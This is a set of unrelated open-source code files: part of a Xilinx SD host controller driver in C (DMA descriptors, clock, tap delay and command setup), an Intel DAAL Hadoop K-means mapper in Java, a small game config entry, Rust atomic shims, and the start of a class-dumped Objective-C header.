}
}
if (BlkCnt == 1U) {
InstancePtr->TransferMode = XSDPS_TM_BLK_CNT_EN_MASK |
XSDPS_TM_DMA_EN_MASK;
} else {
InstancePtr->TransferMode = XSDPS_TM_AUTO_CMD12_EN_MASK |
XSDPS_TM_BLK_CNT_EN_MASK |
XSDPS_TM_MUL_SIN_BLK_SEL_MASK | XSDPS_TM_DMA_EN_MASK;
}
}
/*****************************************************************************/
/**
*
* @brief
* API to setup ADMA2 descriptor table for 32-bit DMA
*
*
* @param InstancePtr is a pointer to the XSdPs instance.
* @param BlkCnt - block count.
* @param Buff pointer to data buffer.
*
* @return None
*
* @note None.
*
******************************************************************************/
void XSdPs_Setup32ADMA2DescTbl(XSdPs *InstancePtr, u32 BlkCnt, const u8 *Buff)
{
#ifdef __ICCARM__
#pragma data_alignment = 32
static XSdPs_Adma2Descriptor32 Adma2_DescrTbl[32];
#else
static XSdPs_Adma2Descriptor32 Adma2_DescrTbl[32] __attribute__ ((aligned(32)));
#endif
u32 TotalDescLines;
u64 DescNum;
u32 BlkSize;
/* Setup ADMA2 - Write descriptor table and point ADMA SAR to it */
BlkSize = (u32)XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_BLK_SIZE_OFFSET) &
XSDPS_BLK_SIZE_MASK;
if((BlkCnt*BlkSize) < XSDPS_DESC_MAX_LENGTH) {
TotalDescLines = 1U;
} else {
TotalDescLines = ((BlkCnt*BlkSize) / XSDPS_DESC_MAX_LENGTH);
if (((BlkCnt * BlkSize) % XSDPS_DESC_MAX_LENGTH) != 0U) {
TotalDescLines += 1U;
}
}
for (DescNum = 0U; DescNum < (TotalDescLines-1); DescNum++) {
Adma2_DescrTbl[DescNum].Address =
(u32)((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
Adma2_DescrTbl[DescNum].Attribute =
XSDPS_DESC_TRAN | XSDPS_DESC_VALID;
Adma2_DescrTbl[DescNum].Length = 0U;
}
Adma2_DescrTbl[TotalDescLines-1].Address =
(u32)((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
Adma2_DescrTbl[TotalDescLines-1].Attribute =
XSDPS_DESC_TRAN | XSDPS_DESC_END | XSDPS_DESC_VALID;
Adma2_DescrTbl[TotalDescLines-1].Length =
(u16)((BlkCnt*BlkSize) - (u32)(DescNum*XSDPS_DESC_MAX_LENGTH));
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, XSDPS_ADMA_SAR_OFFSET,
(u32)((UINTPTR)&(Adma2_DescrTbl[0]) & (u32)~0x0));
if (InstancePtr->Config.IsCacheCoherent == 0U) {
Xil_DCacheFlushRange((INTPTR)&(Adma2_DescrTbl[0]),
sizeof(XSdPs_Adma2Descriptor32) * 32U);
}
}
/*****************************************************************************/
/**
*
* @brief
* API to setup ADMA2 descriptor table for 64-bit DMA
*
*
* @param InstancePtr is a pointer to the XSdPs instance.
* @param BlkCnt - block count.
* @param Buff pointer to data buffer.
*
* @return None
*
* @note None.
*
******************************************************************************/
void XSdPs_Setup64ADMA2DescTbl(XSdPs *InstancePtr, u32 BlkCnt, const u8 *Buff)
{
#ifdef __ICCARM__
#pragma data_alignment = 32
static XSdPs_Adma2Descriptor64 Adma2_DescrTbl[32];
#else
static XSdPs_Adma2Descriptor64 Adma2_DescrTbl[32] __attribute__ ((aligned(32)));
#endif
u32 TotalDescLines;
u64 DescNum;
u32 BlkSize;
/* Setup ADMA2 - Write descriptor table and point ADMA SAR to it */
BlkSize = (u32)XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_BLK_SIZE_OFFSET) &
XSDPS_BLK_SIZE_MASK;
if((BlkCnt*BlkSize) < XSDPS_DESC_MAX_LENGTH) {
TotalDescLines = 1U;
} else {
TotalDescLines = ((BlkCnt*BlkSize) / XSDPS_DESC_MAX_LENGTH);
if (((BlkCnt * BlkSize) % XSDPS_DESC_MAX_LENGTH) != 0U) {
TotalDescLines += 1U;
}
}
for (DescNum = 0U; DescNum < (TotalDescLines-1); DescNum++) {
Adma2_DescrTbl[DescNum].Address =
((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
Adma2_DescrTbl[DescNum].Attribute =
XSDPS_DESC_TRAN | XSDPS_DESC_VALID;
Adma2_DescrTbl[DescNum].Length = 0U;
}
Adma2_DescrTbl[TotalDescLines-1].Address =
(u64)((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
Adma2_DescrTbl[TotalDescLines-1].Attribute =
XSDPS_DESC_TRAN | XSDPS_DESC_END | XSDPS_DESC_VALID;
Adma2_DescrTbl[TotalDescLines-1].Length =
(u16)((BlkCnt*BlkSize) - (u32)(DescNum*XSDPS_DESC_MAX_LENGTH));
#if defined(__aarch64__) || defined(__arch64__)
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, XSDPS_ADMA_SAR_EXT_OFFSET,
(u32)((UINTPTR)(Adma2_DescrTbl)>>32U));
#endif
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, XSDPS_ADMA_SAR_OFFSET,
(u32)((UINTPTR)&(Adma2_DescrTbl[0]) & (u32)~0x0));
if (InstancePtr->Config.IsCacheCoherent == 0U) {
Xil_DCacheFlushRange((INTPTR)&(Adma2_DescrTbl[0]),
sizeof(XSdPs_Adma2Descriptor64) * 32U);
}
}
/*****************************************************************************/
/**
* @brief
* This function is used calculate the clock divisor value.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param SelFreq is the selected frequency
*
* @return Clock divisor value
*
******************************************************************************/
u32 XSdPs_CalcClock(XSdPs *InstancePtr, u32 SelFreq)
{
u16 ClockVal = 0U;
u16 DivCnt;
u16 Divisor = 0U;
if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
/* Calculate divisor */
for (DivCnt = 0x1U; DivCnt <= XSDPS_CC_EXT_MAX_DIV_CNT; DivCnt++) {
if (((InstancePtr->Config.InputClockHz) / DivCnt) <= SelFreq) {
Divisor = DivCnt >> 1;
break;
}
}
} else {
/* Calculate divisor */
for (DivCnt = 0x1U; DivCnt <= XSDPS_CC_MAX_DIV_CNT; DivCnt <<= 1U) {
if (((InstancePtr->Config.InputClockHz) / DivCnt) <= SelFreq) {
Divisor = DivCnt / 2U;
break;
}
}
}
ClockVal |= (Divisor & XSDPS_CC_SDCLK_FREQ_SEL_MASK) << XSDPS_CC_DIV_SHIFT;
ClockVal |= ((Divisor >> 8U) & XSDPS_CC_SDCLK_FREQ_SEL_EXT_MASK) << XSDPS_CC_EXT_DIV_SHIFT;
return ClockVal;
}
/*****************************************************************************/
/**
*
* @brief
* API to Set or Reset the DLL
*
*
* @param InstancePtr is a pointer to the XSdPs instance.
* @param EnRst is a flag indicating whether to Assert or De-assert Reset.
*
* @return None
*
* @note None.
*
******************************************************************************/
void XSdPs_DllRstCtrl(XSdPs *InstancePtr, u8 EnRst)
{
u32 DeviceId;
u32 DllCtrl;
DeviceId = InstancePtr->Config.DeviceId;
#ifdef versal
#ifdef XPAR_PSV_PMC_SD_0_DEVICE_ID
if (DeviceId == 0U) {
#if EL1_NONSECURE && defined (__aarch64__)
(void)DllCtrl;
XSdps_Smc(InstancePtr, SD0_DLL_CTRL, SD_DLL_RST, (EnRst == 1U) ? SD0_DLL_RST : 0U);
#else /* EL1_NONSECURE && defined (__aarch64__) */
DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD0_DLL_CTRL);
if (EnRst == 1U) {
DllCtrl |= SD_DLL_RST;
} else {
DllCtrl &= ~SD_DLL_RST;
}
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD0_DLL_CTRL, DllCtrl);
#endif /* EL1_NONSECURE && defined (__aarch64__) */
} else {
#endif /* XPAR_PSV_PMC_SD_0_DEVICE_ID */
(void) DeviceId;
#if EL1_NONSECURE && defined (__aarch64__)
(void)DllCtrl;
XSdps_Smc(InstancePtr, SD1_DLL_CTRL, SD_DLL_RST, (EnRst == 1U) ? SD_DLL_RST : 0U);
#else
DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD1_DLL_CTRL);
if (EnRst == 1U) {
DllCtrl |= SD_DLL_RST;
} else {
DllCtrl &= ~SD_DLL_RST;
}
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD1_DLL_CTRL, DllCtrl);
#endif
#ifdef XPAR_PSV_PMC_SD_0_DEVICE_ID
}
#endif /* XPAR_PSV_PMC_SD_0_DEVICE_ID */
#else /* versal */
#ifdef XPAR_PSU_SD_0_DEVICE_ID
if (DeviceId == 0U) {
#if EL1_NONSECURE && defined (__aarch64__)
(void)DllCtrl;
XSdps_Smc(InstancePtr, SD_DLL_CTRL, SD0_DLL_RST, (EnRst == 1U) ? SD0_DLL_RST : 0U);
#else
DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL);
if (EnRst == 1U) {
DllCtrl |= SD0_DLL_RST;
} else {
DllCtrl &= ~SD0_DLL_RST;
}
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL, DllCtrl);
#endif
} else {
#endif /* XPAR_PSU_SD_0_DEVICE_ID */
(void) DeviceId;
#if EL1_NONSECURE && defined (__aarch64__)
(void)DllCtrl;
XSdps_Smc(InstancePtr, SD_DLL_CTRL, SD1_DLL_RST, (EnRst == 1U) ? SD1_DLL_RST : 0U);
#else
DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL);
if (EnRst == 1U) {
DllCtrl |= SD1_DLL_RST;
} else {
DllCtrl &= ~SD1_DLL_RST;
}
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL, DllCtrl);
#endif
#ifdef XPAR_PSU_SD_0_DEVICE_ID
}
#endif
#endif
}
/*****************************************************************************/
/**
*
* @brief
* Function to configure the Tap Delays.
*
*
* @param InstancePtr is a pointer to the XSdPs instance.
*
* @return None
*
* @note None.
*
******************************************************************************/
void XSdPs_ConfigTapDelay(XSdPs *InstancePtr)
{
u32 DeviceId;
u32 TapDelay;
u32 ITapDelay;
u32 OTapDelay;
DeviceId = InstancePtr->Config.DeviceId ;
TapDelay = 0U;
ITapDelay = InstancePtr->ITapDelay;
OTapDelay = InstancePtr->OTapDelay;
#ifdef versal
(void) DeviceId;
if (ITapDelay) {
TapDelay = SD_ITAPCHGWIN;
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
/* Program the ITAPDLY */
TapDelay |= SD_ITAPDLYENA;
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
TapDelay |= ITapDelay;
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
TapDelay &= ~SD_ITAPCHGWIN;
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
}
if (OTapDelay) {
/* Program the OTAPDLY */
TapDelay = SD_OTAPDLYENA;
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_OTAPDLY, TapDelay);
TapDelay |= OTapDelay;
XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_OTAPDLY, TapDelay);
}
#else
#ifdef XPAR_PSU_SD_0_DEVICE_ID
if (DeviceId == 0U) {
#if EL1_NONSECURE && defined (__aarch64__)
(void)TapDelay;
if (ITapDelay) {
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPCHGWIN, SD0_ITAPCHGWIN);
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPDLYENA, SD0_ITAPDLYENA);
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPDLY_SEL_MASK, ITapDelay);
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPCHGWIN, 0U);
}
if (OTapDelay) {
XSdps_Smc(InstancePtr, SD_OTAPDLY, SD0_OTAPDLY_SEL_MASK, OTapDelay);
}
#else
if (ITapDelay) {
TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY);
TapDelay |= SD0_ITAPCHGWIN;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
/* Program the ITAPDLY */
TapDelay |= SD0_ITAPDLYENA;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
TapDelay |= ITapDelay;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
TapDelay &= ~SD0_ITAPCHGWIN;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
}
if (OTapDelay) {
/* Program the OTAPDLY */
TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY);
TapDelay &= ~SD0_OTAPDLY_SEL_MASK;
TapDelay |= OTapDelay;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY, TapDelay);
}
#endif
} else {
#endif
(void) DeviceId;
ITapDelay = ITapDelay << 16U;
OTapDelay = OTapDelay << 16U;
#if EL1_NONSECURE && defined (__aarch64__)
(void)TapDelay;
if (ITapDelay) {
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPCHGWIN, SD1_ITAPCHGWIN);
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPDLYENA, SD1_ITAPDLYENA);
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPDLY_SEL_MASK, ITapDelay);
XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPCHGWIN, 0U);
}
if (OTapDelay) {
XSdps_Smc(InstancePtr, SD_OTAPDLY, SD1_OTAPDLY_SEL_MASK, OTapDelay);
}
#else
if (ITapDelay) {
TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY);
TapDelay |= SD1_ITAPCHGWIN;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
/* Program the ITAPDLY */
TapDelay |= SD1_ITAPDLYENA;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
TapDelay |= ITapDelay;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
TapDelay &= ~SD1_ITAPCHGWIN;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
}
if (OTapDelay) {
/* Program the OTAPDLY */
TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY);
TapDelay &= ~SD1_OTAPDLY_SEL_MASK;
TapDelay |= OTapDelay;
XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY, TapDelay);
}
#endif
#ifdef XPAR_PSU_SD_0_DEVICE_ID
}
#endif
#endif /* versal */
}
/*****************************************************************************/
/**
* @brief
* This function is used to set voltage to 1.8V.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return
* - XST_SUCCESS if successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_SetVoltage18(XSdPs *InstancePtr)
{
s32 Status;
u16 CtrlReg;
/* Enabling 1.8V in controller */
CtrlReg = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_HOST_CTRL2_OFFSET);
CtrlReg |= XSDPS_HC2_1V8_EN_MASK;
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress, XSDPS_HOST_CTRL2_OFFSET,
CtrlReg);
/* Wait minimum 5mSec */
(void)usleep(5000U);
/* Check for 1.8V signal enable bit is cleared by Host */
Status = XSdPs_CheckVoltage18(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
}
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function is used configure the Power Level.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
void XSdPs_ConfigPower(XSdPs *InstancePtr)
{
u8 PowerLevel;
if ((InstancePtr->Host_Caps & XSDPS_CAP_VOLT_3V3_MASK) != 0U) {
PowerLevel = XSDPS_PC_BUS_VSEL_3V3_MASK;
} else if ((InstancePtr->Host_Caps & XSDPS_CAP_VOLT_3V0_MASK) != 0U) {
PowerLevel = XSDPS_PC_BUS_VSEL_3V0_MASK;
} else if ((InstancePtr->Host_Caps & XSDPS_CAP_VOLT_1V8_MASK) != 0U) {
PowerLevel = XSDPS_PC_BUS_VSEL_1V8_MASK;
} else {
PowerLevel = 0U;
}
/* Select voltage based on capability and enable bus power. */
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
XSDPS_POWER_CTRL_OFFSET,
PowerLevel | XSDPS_PC_BUS_PWR_MASK);
}
/*****************************************************************************/
/**
* @brief
* This function is used configure the DMA.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
void XSdPs_ConfigDma(XSdPs *InstancePtr)
{
if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
/* Enable ADMA2 in 64bit mode. */
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
XSDPS_HOST_CTRL1_OFFSET,
XSDPS_HC_DMA_ADMA2_64_MASK);
} else {
/* Enable ADMA2 in 32bit mode. */
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
XSDPS_HOST_CTRL1_OFFSET,
XSDPS_HC_DMA_ADMA2_32_MASK);
}
}
/*****************************************************************************/
/**
* @brief
* This function is used configure the Interrupts.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
void XSdPs_ConfigInterrupt(XSdPs *InstancePtr)
{
/* Enable all interrupt status except card interrupt initially */
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_STS_EN_OFFSET,
XSDPS_NORM_INTR_ALL_MASK & (~XSDPS_INTR_CARD_MASK));
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_ERR_INTR_STS_EN_OFFSET,
XSDPS_ERROR_INTR_ALL_MASK);
/* Disable all interrupt signals by default. */
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_SIG_EN_OFFSET, 0x0U);
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_ERR_INTR_SIG_EN_OFFSET, 0x0U);
}
/*****************************************************************************/
/**
* This function does SD command generation.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param Cmd is the command to be sent.
* @param Arg is the argument to be sent along with the command.
* This could be address or any other information
* @param BlkCnt - Block count passed by the user.
*
* @return
* - XST_SUCCESS if initialization was successful
* - XST_FAILURE if failure - could be because another transfer
* is in progress or command or data inhibit is set
*
******************************************************************************/
s32 XSdPs_CmdTransfer(XSdPs *InstancePtr, u32 Cmd, u32 Arg, u32 BlkCnt)
{
u32 Timeout = 10000000U;
u32 StatusReg;
s32 Status;
Status = XSdPs_SetupCmd(InstancePtr, Arg, BlkCnt);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
Status = XSdPs_SendCmd(InstancePtr, Cmd);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Polling for response for now */
do {
StatusReg = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_STS_OFFSET);
if ((Cmd == CMD21) || (Cmd == CMD19)) {
if ((XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_STS_OFFSET) & XSDPS_INTR_BRR_MASK) != 0U){
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_STS_OFFSET, XSDPS_INTR_BRR_MASK);
break;
}
}
if ((StatusReg & XSDPS_INTR_ERR_MASK) != 0U) {
Status = (s32)XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_ERR_INTR_STS_OFFSET);
if (((u32)Status & ~XSDPS_INTR_ERR_CT_MASK) == 0U) {
Status = XSDPS_CT_ERROR;
}
/* Write to clear error bits */
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_ERR_INTR_STS_OFFSET,
XSDPS_ERROR_INTR_ALL_MASK);
goto RETURN_PATH;
}
Timeout = Timeout - 1U;
} while (((StatusReg & XSDPS_INTR_CC_MASK) == 0U)
&& (Timeout != 0U));
/* Write to clear bit */
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_STS_OFFSET,
XSDPS_INTR_CC_MASK);
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* This function is used to check if the transfer is completed successfully.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
s32 XSdps_CheckTransferDone(XSdPs *InstancePtr)
{
u32 Timeout = 5000000U;
u16 StatusReg;
s32 Status;
/*
* Check for transfer complete
* Polling for response for now
*/
do {
StatusReg = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_STS_OFFSET);
if ((StatusReg & XSDPS_INTR_ERR_MASK) != 0U) {
/* Write to clear error bits */
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_ERR_INTR_STS_OFFSET,
XSDPS_ERROR_INTR_ALL_MASK);
Status = XST_FAILURE;
goto RETURN_PATH;
}
Timeout = Timeout - 1U;
usleep(1);
} while (((StatusReg & XSDPS_INTR_TC_MASK) == 0U)
&& (Timeout != 0U));
if (Timeout == 0U) {
Status = XST_FAILURE;
goto RETURN_PATH ;
}
/* Write to clear bit */
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_NORM_INTR_STS_OFFSET, XSDPS_INTR_TC_MASK);
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function is used to check if the CMD/DATA bus is idle or not.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param Value is to selct Cmd bus or Dat bus
*
* @return None
*
******************************************************************************/
s32 XSdPs_CheckBusIdle(XSdPs *InstancePtr, u32 Value)
{
u32 Timeout = 10000000U;
u32 PresentStateReg;
u32 StatusReg;
s32 Status;
PresentStateReg = XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
XSDPS_PRES_STATE_OFFSET);
/* Check for Card Present */
if ((PresentStateReg & XSDPS_PSR_CARD_INSRT_MASK) != 0U) {
/* Check for SD idle */
do {
StatusReg = XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
XSDPS_PRES_STATE_OFFSET);
Timeout = Timeout - 1;
usleep(1);
} while (((StatusReg & Value) != 0U)
&& (Timeout != 0U));
}
if (Timeout == 0U) {
Status = XST_FAILURE;
goto RETURN_PATH ;
}
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function frames the Command register for a particular command.
* Note that this generates only the command register value i.e.
* the upper 16 bits of the transfer mode and command register.
* This value is already shifted to be upper 16 bits and can be directly
* OR'ed with transfer mode register value.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param Cmd is the Command to be sent.
*
* @return Command register value complete with response type and
* data, CRC and index related flags.
*
******************************************************************************/
u32 XSdPs_FrameCmd(XSdPs *InstancePtr, u32 Cmd)
{
u32 RetVal;
RetVal = Cmd;
switch(Cmd) {
case CMD0:
RetVal |= RESP_NONE;
break;
case CMD1:
RetVal |= RESP_R3;
break;
case CMD2:
RetVal |= RESP_R2;
break;
case CMD3:
if (InstancePtr->CardType == XSDPS_CARD_SD) {
RetVal |= RESP_R6;
} else {
RetVal |= RESP_R1;
}
break;
case CMD4:
RetVal |= RESP_NONE;
break;
case CMD5:
RetVal |= RESP_R1B;
break;
case CMD6:
if (InstancePtr->CardType == XSDPS_CARD_SD) {
RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
} else {
RetVal |= RESP_R1B;
}
break;
case ACMD6:
RetVal |= RESP_R1;
break;
case CMD7:
RetVal |= RESP_R1;
break;
case CMD8:
if (InstancePtr->CardType == XSDPS_CARD_SD) {
RetVal |= RESP_R1;
} else {
RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
}
break;
case CMD9:
RetVal |= RESP_R2;
break;
case CMD11:
case CMD10:
case CMD12:
RetVal |= RESP_R1;
break;
case ACMD13:
RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
break;
case CMD16:
RetVal |= RESP_R1;
break;
case CMD17:
case CMD18:
case CMD19:
case CMD21:
RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
break;
case CMD23:
case ACMD23:
case CMD24:
case CMD25:
RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
break;
case ACMD41:
RetVal |= RESP_R3;
break;
case ACMD42:
RetVal |= RESP_R1;
break;
case ACMD51:
RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
break;
case CMD52:
case CMD55:
RetVal |= RESP_R1;
break;
case CMD58:
break;
default :
RetVal |= Cmd;
break;
}
return RetVal;
}
/** @} */
| {
"pile_set_name": "Github"
} |
/* file: KmeansDenseInitStep1Mapper.java */
/*******************************************************************************
* Copyright 2017-2020 Intel Corporation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*******************************************************************************/
package DAAL;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.BufferedWriter;
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import org.apache.hadoop.fs.*;
import org.apache.hadoop.io.*;
import org.apache.hadoop.mapreduce.Mapper;
import org.apache.hadoop.mapreduce.Mapper.Context;
import org.apache.hadoop.conf.Configuration;
import com.intel.daal.data_management.data.HomogenNumericTable;
import com.intel.daal.algorithms.kmeans.init.*;
import com.intel.daal.algorithms.kmeans.*;
import com.intel.daal.data_management.data.*;
import com.intel.daal.services.*;
public class KmeansDenseInitStep1Mapper extends Mapper<Object, Text, IntWritable, WriteableData> {
private static final int nBlocks = 4;
private static final int nFeatures = 20;
private static final int nVectorsInBlock = 10000;
private static final long nClusters = 20;
/* Index is supposed to be a sequence number for the split */
private int index = 0;
private int i = 0;
private int totalTasks = 0;
@Override
public void setup(Context context) {
index = context.getTaskAttemptID().getTaskID().getId();
Configuration conf = context.getConfiguration();
totalTasks = conf.getInt("mapred.map.tasks", 0);
}
@Override
public void map(Object key, Text value,
Context context) throws IOException, InterruptedException {
DaalContext daalContext = new DaalContext();
/* Read a data set */
String filePath = "/Hadoop/KmeansDense/data/" + value;
double[] data = new double[nFeatures * nVectorsInBlock];
readData(filePath, nFeatures, nVectorsInBlock, data);
HomogenNumericTable ntData = new HomogenNumericTable(daalContext, data, nFeatures, nVectorsInBlock);
/* Create an algorithm to initialize the K-Means algorithm on local nodes */
InitDistributedStep1Local kmeansLocalInit = new InitDistributedStep1Local(daalContext, Double.class, InitMethod.randomDense,
nClusters, nVectorsInBlock * nBlocks, nVectorsInBlock * index);
kmeansLocalInit.input.set( InitInputId.data, ntData );
/* Initialize the K-Means algorithm on local nodes */
InitPartialResult pres = kmeansLocalInit.compute();
/* Write the data prepended with a data set sequence number. Needed to know the position of the data set in the input data */
context.write(new IntWritable(0), new WriteableData(index, pres));
daalContext.dispose();
index += totalTasks;
}
private static void readData(String dataset, int nFeatures, int nVectors, double[] data) {
System.out.println("readData " + dataset);
try {
Path pt = new Path(dataset);
FileSystem fs = FileSystem.get(new Configuration());
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(fs.open(pt)));
int nLine = 0;
for (String line; ((line = bufferedReader.readLine()) != null) && (nLine < nVectors); nLine++) {
String[] elements = line.split(",");
for (int j = 0; j < nFeatures; j++) {
data[nLine * nFeatures + j] = Double.parseDouble(elements[j]);
}
}
bufferedReader.close();
}
catch (IOException e) {
e.printStackTrace();
}
catch (NumberFormatException e) {
e.printStackTrace();
}
}
}
| {
"pile_set_name": "Github"
} |
"relic_void_spirit_triple_hero_pulse"
{
"template" "void_spirit_triple_hero_pulse"
"no_plus" "1"
"<hero_hit_count>"
{
"1" "1"
}
}
| {
"pile_set_name": "Github"
} |
#[cfg(not(all(test, loom)))]
pub(crate) mod sync {
pub(crate) mod atomic {
pub(crate) use core::sync::atomic::{fence, AtomicPtr, AtomicUsize, Ordering};
pub(crate) trait AtomicMut<T> {
fn with_mut<F, R>(&mut self, f: F) -> R
where
F: FnOnce(&mut *mut T) -> R;
}
impl<T> AtomicMut<T> for AtomicPtr<T> {
fn with_mut<F, R>(&mut self, f: F) -> R
where
F: FnOnce(&mut *mut T) -> R,
{
f(self.get_mut())
}
}
}
}
#[cfg(all(test, loom))]
pub(crate) mod sync {
pub(crate) mod atomic {
pub(crate) use loom::sync::atomic::{fence, AtomicPtr, AtomicUsize, Ordering};
pub(crate) trait AtomicMut<T> {}
}
}
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import <Cocoa/NSObject.h>
@class Album, ImportSession2, NSArray;
@interface QueuedImportSession : NSObject
{
ImportSession2 *_session;
NSArray *_files;
struct IPPhotoList *_photos;
Album *_cameraAlbum;
